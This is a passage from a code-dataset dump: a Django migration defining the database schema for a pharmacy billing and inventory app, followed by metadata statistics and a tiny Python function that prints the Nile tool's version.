import django.db.models.deletion
class Migration(migrations.Migration):
    """Create the initial bmcore schema (generated by Django 1.11.6).

    Declares a group of unmanaged display/report models (``managed=False``,
    so Django creates no tables for them — they map onto externally
    maintained tables/views such as ``vw_tax_summary``), then the managed
    master and transaction tables (accounts, batches, vouchers, inventory,
    customers, ...), and finally the foreign-key / many-to-many links
    between them.
    """

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('bmcore', '0004_auto_20171028_1114'),
    ]

    operations = [
        # --- Unmanaged display/report models (no tables created) ---
        migrations.CreateModel(
            name='CashierCashDisplayReport',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('voucher_no', models.CharField(blank=True, max_length=10, null=True)),
                ('voucher_type', models.CharField(blank=True, max_length=30, null=True)),
                ('cashier_id', models.IntegerField()),
                ('voucher_id', models.IntegerField()),
                ('checked', models.BooleanField(default=False)),
                ('viewed', models.BooleanField(default=False)),
                ('amount', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
                ('updated', models.DateTimeField(auto_now=True)),
                ('created_by', models.CharField(blank=True, max_length=50, null=True)),
            ],
            options={
                'managed': False,
            },
        ),
        migrations.CreateModel(
            name='PendingDisplay',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('account_id', models.IntegerField()),
                ('account_name', models.CharField(max_length=100)),
                ('ref_no', models.CharField(max_length=40)),
                ('bill_amount', models.DecimalField(decimal_places=2, max_digits=20)),
                ('adjusted', models.DecimalField(decimal_places=2, max_digits=20)),
                ('adj_id', models.IntegerField()),
                ('branch_id', models.IntegerField()),
                ('branch_name', models.CharField(max_length=100)),
            ],
            options={
                'managed': False,
            },
        ),
        migrations.CreateModel(
            name='SaleBatchDisplay',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('batch_id', models.IntegerField()),
                ('batch_name', models.CharField(max_length=45)),
                ('exp_month', models.IntegerField()),
                ('exp_year', models.IntegerField()),
                ('stock', models.IntegerField()),
                ('mrp', models.DecimalField(decimal_places=2, max_digits=20)),
                ('s_disc', models.DecimalField(decimal_places=2, max_digits=20)),
                ('inventory_id', models.IntegerField()),
                ('inventory_name', models.CharField(max_length=100)),
                ('bwd', models.BooleanField()),
                ('tax_id', models.IntegerField()),
                ('tax_name', models.CharField(max_length=45)),
                ('tax_sgst_ratio', models.DecimalField(decimal_places=2, max_digits=20)),
                ('tax_cgst_ratio', models.DecimalField(decimal_places=2, max_digits=20)),
                ('tax_igst_ratio', models.DecimalField(decimal_places=2, max_digits=20)),
                ('rack_id', models.IntegerField()),
                ('rack_name', models.CharField(max_length=10)),
                ('pack_id', models.IntegerField()),
                ('pack_name', models.CharField(max_length=10)),
                ('pack_conv', models.IntegerField()),
            ],
            options={
                'managed': False,
            },
        ),
        migrations.CreateModel(
            name='TaxSummaryDisplay',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('voucher_id', models.IntegerField()),
                ('voucher_type', models.CharField(max_length=45)),
                ('voucher_no', models.CharField(max_length=45)),
                ('tax_id', models.IntegerField()),
                ('tax_name', models.CharField(max_length=45)),
                ('amount_value', models.DecimalField(decimal_places=2, max_digits=20)),
                ('cgst_value', models.DecimalField(decimal_places=2, max_digits=20)),
                ('sgst_value', models.DecimalField(decimal_places=2, max_digits=20)),
                ('igst_value', models.DecimalField(decimal_places=2, max_digits=20)),
                ('inventory_id', models.IntegerField()),
            ],
            options={
                'db_table': 'vw_tax_summary',
                'managed': False,
            },
        ),
        migrations.CreateModel(
            name='VoucherLedger',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('bwd', models.BooleanField()),
                ('name', models.CharField(max_length=55)),
                ('class_flag', models.IntegerField()),
            ],
            options={
                'managed': False,
            },
        ),
        # --- Managed tables ---
        migrations.CreateModel(
            name='AccountTransaction',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('debit', models.DecimalField(blank=True, decimal_places=2, default=0, max_digits=20, null=True)),
                ('credit', models.DecimalField(blank=True, decimal_places=2, default=0, max_digits=20, null=True)),
                ('debit_pend', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
                ('credit_pend', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
                ('narration', models.CharField(blank=True, max_length=50, null=True)),
                ('bwd', models.CharField(blank=True, max_length=50, null=True)),
                ('instrument_no', models.CharField(blank=True, max_length=50, null=True)),
                ('instrument_date', models.DateField(blank=True, null=True)),
                ('bank_name', models.CharField(blank=True, max_length=50, null=True)),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
                ('updated', models.DateTimeField(auto_now=True)),
                ('account', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='transaction_account', to='bmcore.Account')),
                ('account1', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='cash_transfer_account', to='bmcore.Account')),
            ],
            options={
                'ordering': ['-timestamp', '-updated'],
                'db_table': 'tbl_acc_tran',
            },
        ),
        migrations.CreateModel(
            name='Batch',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(blank=True, max_length=55, null=True)),
                ('bwd', models.BooleanField(default=True)),
                ('pack_conv', models.IntegerField(blank=True, null=True)),
                ('exp_month', models.IntegerField(blank=True, null=True)),
                ('exp_year', models.IntegerField(blank=True, null=True)),
                ('debit', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
                ('credit', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
                ('stock', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
                ('mrp', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
                ('p_rate', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
                ('p_cost', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
                ('s_rate', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
                ('s_cost', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
                ('tran', models.CharField(max_length=10)),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
                ('updated', models.DateTimeField(auto_now=True)),
                ('branch', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='batch_branch', to='bmcore.Branch')),
            ],
            options={
                'ordering': ['-timestamp', '-updated'],
                'db_table': 'tbl_batch',
            },
        ),
        migrations.CreateModel(
            name='BillWiseDetail',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('amount', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
                ('adj_ref', models.IntegerField(blank=True, null=True)),
                ('adj_id', models.IntegerField(blank=True, null=True)),
                ('ref_no', models.CharField(blank=True, max_length=25, null=True)),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
                ('updated', models.DateTimeField(auto_now=True)),
                ('account', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='billwisedetail_account', to='bmcore.Account')),
                ('tran', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='billwisedetails', to='bmcore.AccountTransaction')),
            ],
            options={
                'ordering': ['-timestamp', '-updated'],
                'db_table': 'tbl_acc_bwd',
            },
        ),
        migrations.CreateModel(
            name='CashierCashDisplay',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('checked', models.BooleanField(default=False)),
                ('viewed', models.BooleanField(default=False)),
                ('created_by', models.CharField(blank=True, max_length=50, null=True)),
                ('voucher_no', models.CharField(blank=True, max_length=10, null=True)),
                ('voucher_type', models.CharField(blank=True, max_length=30, null=True)),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
                ('updated', models.DateTimeField(auto_now=True)),
                ('branch', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='cashsale_batch', to='bmcore.Branch')),
                ('cashier', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='cashsale_cashier', to='bmcore.Account')),
            ],
            options={
                'ordering': ['-timestamp', '-updated'],
                'db_table': 'tbl_cashier_cash_display',
            },
        ),
        migrations.CreateModel(
            name='Composition',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=500)),
                ('val_name', models.CharField(blank=True, max_length=500, null=True)),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
                ('updated', models.DateTimeField(auto_now=True)),
                ('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ['-timestamp', '-updated'],
                'db_table': 'tbl_composition',
            },
        ),
        migrations.CreateModel(
            name='CoreConf',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('particulars', models.CharField(max_length=100)),
                ('flag_1', models.BooleanField()),
            ],
            options={
                'db_table': 'tbl_core_conf',
            },
        ),
        migrations.CreateModel(
            name='Customer',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(blank=True, max_length=55, null=True)),
                ('val_name', models.CharField(blank=True, max_length=55, null=True)),
                ('alias_name', models.CharField(blank=True, max_length=55, null=True)),
                ('print_name', models.CharField(blank=True, max_length=55, null=True)),
                ('door', models.CharField(blank=True, max_length=10, null=True)),
                ('street', models.CharField(blank=True, max_length=100, null=True)),
                ('station', models.CharField(blank=True, max_length=20, null=True)),
                ('district', models.CharField(blank=True, max_length=15, null=True)),
                ('state', models.CharField(blank=True, max_length=15, null=True)),
                ('telephone', models.CharField(blank=True, max_length=15, null=True)),
                ('mobile', models.CharField(blank=True, max_length=10, null=True)),
                ('email', models.EmailField(blank=True, max_length=254, null=True)),
                ('inv_req', models.CharField(blank=True, max_length=10, null=True)),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
                ('updated', models.DateTimeField(auto_now=True)),
                ('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ['-timestamp', '-updated'],
                'db_table': 'tbl_customer',
            },
        ),
        migrations.CreateModel(
            name='Doctor',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(blank=True, max_length=55, null=True)),
                ('val_name', models.CharField(blank=True, max_length=55, null=True)),
                ('alias_name', models.CharField(blank=True, max_length=55, null=True)),
                ('register_no', models.CharField(blank=True, max_length=55, null=True)),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
                ('updated', models.DateTimeField(auto_now=True)),
                ('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ['-timestamp', '-updated'],
                'db_table': 'tbl_doctor',
            },
        ),
        migrations.CreateModel(
            name='FinancialYear',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=20)),
                ('fn_begin', models.DateField()),
                ('book_begin', models.DateField()),
                ('active', models.BooleanField(default=False)),
            ],
            options={
                'db_table': 'tbl_financial_year',
            },
        ),
        migrations.CreateModel(
            name='Inventory',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=100)),
                ('val_name', models.CharField(blank=True, max_length=100, null=True)),
                ('alias_name', models.CharField(blank=True, max_length=100, null=True)),
                ('bwd', models.BooleanField(default=True)),
                ('schedule_h', models.BooleanField(default=False)),
                ('schedule_h1', models.BooleanField(default=False)),
                ('narcotic', models.BooleanField(default=False)),
                ('for_order', models.BooleanField(default=True)),
                ('prohibited', models.BooleanField(default=False)),
                ('hide', models.BooleanField(default=False)),
                ('min_order_lvl', models.IntegerField(default=0)),
                ('max_order_lvl', models.IntegerField(default=0)),
                ('re_order_lvl', models.IntegerField(default=0)),
                ('range_order_lvl', models.IntegerField(default=0)),
                ('s_disc', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
                ('migration_id', models.IntegerField(blank=True, null=True)),
                ('migration_name', models.CharField(blank=True, max_length=100, null=True)),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
                ('updated', models.DateTimeField(auto_now=True)),
                ('composition', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='bmcore.Composition')),
                ('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ['-timestamp', '-updated'],
                'db_table': 'tbl_inventory',
            },
        ),
        migrations.CreateModel(
            name='InventoryTransaction',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('batch_value', models.CharField(blank=True, max_length=20, null=True)),
                ('qty', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
                ('free', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
                ('p_rate', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
                ('p_cost', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
                ('supp_profit_ratio', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
                ('disc', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
                ('disc_value', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
                ('mrp', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
                ('s_rate', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
                ('s_cost', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
                ('tax_value', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
                ('amount', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
                ('amount_value', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
                ('cl', models.BooleanField(default=True)),
                ('ol', models.BooleanField(default=False)),
                ('inward', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
                ('outward', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
                ('pack_conv', models.IntegerField(blank=True, null=True)),
                ('exp_month', models.IntegerField(blank=True, null=True)),
                ('exp_year', models.IntegerField(blank=True, null=True)),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
                ('updated', models.DateTimeField(auto_now=True)),
                ('batch', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='inventory_transaction_batch', to='bmcore.Batch')),
                ('inventory', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='bmcore.Inventory')),
            ],
            options={
                'db_table': 'tbl_inv_tran',
            },
        ),
        migrations.CreateModel(
            name='Manufacturer',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=100)),
                ('val_name', models.CharField(blank=True, max_length=100, null=True)),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
                ('updated', models.DateTimeField(auto_now=True)),
                ('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ['-timestamp', '-updated'],
                'db_table': 'tbl_manufacturer',
            },
        ),
        migrations.CreateModel(
            name='Pack',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(blank=True, max_length=10, null=True)),
                ('val_name', models.CharField(blank=True, max_length=10, null=True)),
                ('print_name', models.CharField(blank=True, max_length=11, null=True)),
                ('conversion', models.IntegerField(blank=True, null=True)),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
                ('updated', models.DateTimeField(auto_now=True)),
                ('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ['-timestamp', '-updated'],
                'db_table': 'tbl_pack',
            },
        ),
        migrations.CreateModel(
            name='Pending',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('ref_no', models.CharField(blank=True, max_length=40, null=True)),
                ('bill_amount', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
                ('adjusted', models.DecimalField(decimal_places=2, max_digits=20)),
                ('adj_id', models.IntegerField()),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
                ('updated', models.DateTimeField(auto_now=True)),
                ('account', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='pending_account', to='bmcore.Account')),
                ('branch', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='pending_branch', to='bmcore.Branch')),
            ],
            options={
                'ordering': ['-timestamp', '-updated'],
                'db_table': 'tbl_acc_pending',
            },
        ),
        migrations.CreateModel(
            name='Rack',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=10)),
                ('val_name', models.CharField(blank=True, max_length=10, null=True)),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
                ('updated', models.DateTimeField(auto_now=True)),
                ('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ['-timestamp', '-updated'],
                'db_table': 'tbl_rack',
            },
        ),
        migrations.CreateModel(
            name='Salt',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=50)),
                ('val_name', models.CharField(blank=True, max_length=50, null=True)),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
                ('updated', models.DateTimeField(auto_now=True)),
                ('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ['-timestamp', '-updated'],
                'db_table': 'tbl_salt',
            },
        ),
        migrations.CreateModel(
            name='Section',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=20)),
                ('val_name', models.CharField(blank=True, max_length=20, null=True)),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
                ('updated', models.DateTimeField(auto_now=True)),
                ('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ['-timestamp', '-updated'],
                'db_table': 'tbl_section',
            },
        ),
        migrations.CreateModel(
            name='Tax',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=40)),
                ('val_name', models.CharField(blank=True, max_length=40, null=True)),
                ('tax_type', models.CharField(max_length=40)),
                ('sgst_ratio', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
                ('cgst_ratio', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
                ('igst_ratio', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
                ('updated', models.DateTimeField(auto_now=True)),
                ('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ['-timestamp', '-updated'],
                'db_table': 'tbl_tax',
            },
        ),
        migrations.CreateModel(
            name='Therapy',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=60)),
                ('val_name', models.CharField(blank=True, max_length=60, null=True)),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
                ('updated', models.DateTimeField(auto_now=True)),
                ('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ['-timestamp', '-updated'],
                'db_table': 'tbl_therapy',
            },
        ),
        migrations.CreateModel(
            name='Voucher',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('trans_date', models.DateField(blank=True, null=True)),
                ('value_date', models.DateField(blank=True, null=True)),
                ('rounded', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
                ('discount', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
                ('voucher_no', models.CharField(blank=True, max_length=10, null=True)),
                ('voucher_type', models.CharField(blank=True, max_length=30, null=True)),
                ('ref_no', models.CharField(blank=True, max_length=10, null=True)),
                ('narration', models.CharField(blank=True, max_length=100, null=True)),
                ('voucher_model', models.IntegerField(blank=True, null=True)),
                ('tax_exempt', models.BooleanField(default=False)),
                ('tran', models.CharField(blank=True, max_length=50, null=True)),
                ('batch', models.CharField(blank=True, max_length=50, null=True)),
                ('status', models.BooleanField(default=True)),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
                ('updated', models.DateTimeField(auto_now=True)),
                ('account1', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='voucher_account1', to='bmcore.Account')),
                ('account2', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='voucher_account2', to='bmcore.Account')),
                ('branch', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='bmcore.Branch')),
                ('cashier', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='voucher_cashier', to='bmcore.Account')),
                ('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
                ('customer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='voucher_customer', to='bmcore.Customer')),
                ('doctor', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='voucher_doctor', to='bmcore.Doctor')),
                ('op_account', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='bmcore.Account')),
                ('op_inventory', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='bmcore.Inventory')),
            ],
            options={
                'ordering': ['-timestamp', '-updated'],
                'db_table': 'tbl_voucher',
            },
        ),
        migrations.CreateModel(
            name='VoucherModel',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=45)),
                ('prefix', models.CharField(blank=True, max_length=8, null=True)),
                ('suffix', models.CharField(blank=True, max_length=8, null=True)),
                ('vch_no', models.IntegerField(blank=True, null=True)),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
                ('updated', models.DateTimeField(auto_now=True)),
                ('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ['-timestamp', '-updated'],
                'db_table': 'tbl_vch',
            },
        ),
        migrations.CreateModel(
            name='VoucherTemplate',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=45)),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
                ('updated', models.DateTimeField(auto_now=True)),
                ('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ['-timestamp', '-updated'],
                'db_table': 'tbl_vch_tpl',
            },
        ),
        migrations.CreateModel(
            name='VoucherType',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=45)),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
                ('updated', models.DateTimeField(auto_now=True)),
                ('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ['-timestamp', '-updated'],
                'db_table': 'tbl_vch_type',
            },
        ),
        # --- Relations added after all referenced models exist ---
        migrations.AddField(
            model_name='vouchertemplate',
            name='voucher_type',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='bmcore.VoucherType'),
        ),
        migrations.AddField(
            model_name='vouchermodel',
            name='voucher_template',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='voucher_model_voucher_template', to='bmcore.VoucherTemplate'),
        ),
        migrations.AddField(
            model_name='inventorytransaction',
            name='pack',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='bmcore.Pack'),
        ),
        migrations.AddField(
            model_name='inventorytransaction',
            name='tax',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='bmcore.Tax'),
        ),
        migrations.AddField(
            model_name='inventorytransaction',
            name='voucher',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='inventory_transactions', to='bmcore.Voucher'),
        ),
        migrations.AddField(
            model_name='inventory',
            name='manufacturer',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='bmcore.Manufacturer'),
        ),
        migrations.AddField(
            model_name='inventory',
            name='rack',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='bmcore.Rack'),
        ),
        migrations.AddField(
            model_name='inventory',
            name='section',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='bmcore.Section'),
        ),
        migrations.AddField(
            model_name='inventory',
            name='tax',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='bmcore.Tax'),
        ),
        migrations.AddField(
            model_name='inventory',
            name='therapy',
            field=models.ManyToManyField(blank=True, to='bmcore.Therapy'),
        ),
        migrations.AddField(
            model_name='composition',
            name='salt',
            field=models.ManyToManyField(blank=True, to='bmcore.Salt'),
        ),
        migrations.AddField(
            model_name='cashiercashdisplay',
            name='voucher',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='cashsale_voucher', to='bmcore.Voucher'),
        ),
        migrations.AddField(
            model_name='batch',
            name='inventory',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='bmcore.Inventory'),
        ),
        migrations.AddField(
            model_name='batch',
            name='pack',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='bmcore.Pack'),
        ),
        migrations.AddField(
            model_name='accounttransaction',
            name='voucher',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='account_transactions', to='bmcore.Voucher'),
        ),
    ]
| 57.974724 | 176 | 0.581612 | 3,760 | 36,698 | 5.497872 | 0.060904 | 0.057904 | 0.030186 | 0.045279 | 0.836784 | 0.826093 | 0.789716 | 0.765045 | 0.747049 | 0.69969 | 0 | 0.014039 | 0.270205 | 36,698 | 632 | 177 | 58.066456 | 0.757822 | 0.001853 | 0 | 0.5888 | 1 | 0 | 0.129331 | 0.006553 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.0064 | 0 | 0.0112 | 0.0032 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
37f2a7323721fe5dde502fa1a5d8ca25b345ede2 | 153 | py | Python | src/nile/core/version.py | kootsZhin/nile | 5b685158c06418a126229cfbcaeaaf78a38cd8a0 | [
"MIT"
] | 121 | 2021-10-30T08:42:44.000Z | 2022-03-31T13:17:58.000Z | src/nile/core/version.py | kootsZhin/nile | 5b685158c06418a126229cfbcaeaaf78a38cd8a0 | [
"MIT"
] | 56 | 2021-10-31T16:45:06.000Z | 2022-03-31T04:41:08.000Z | src/nile/core/version.py | kootsZhin/nile | 5b685158c06418a126229cfbcaeaaf78a38cd8a0 | [
"MIT"
] | 22 | 2021-11-18T11:24:56.000Z | 2022-03-30T08:15:18.000Z | """Command to print Nile version."""
from nile import __version__ as nile_version
def version():
    """Write the installed Nile version string to stdout."""
    print(nile_version)
| 19.125 | 44 | 0.699346 | 20 | 153 | 5.05 | 0.45 | 0.435644 | 0.475248 | 0.455446 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.176471 | 153 | 7 | 45 | 21.857143 | 0.801587 | 0.326797 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0.333333 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 9 |
5307f07f91db7c56862f7590b68b346f6ff0bc4f | 8,881 | py | Python | detection/app_params.py | ckyrkou/Keras_Object_Detection | 3aa84632b3454f1440498e424133437d2c242e2d | [
"MIT"
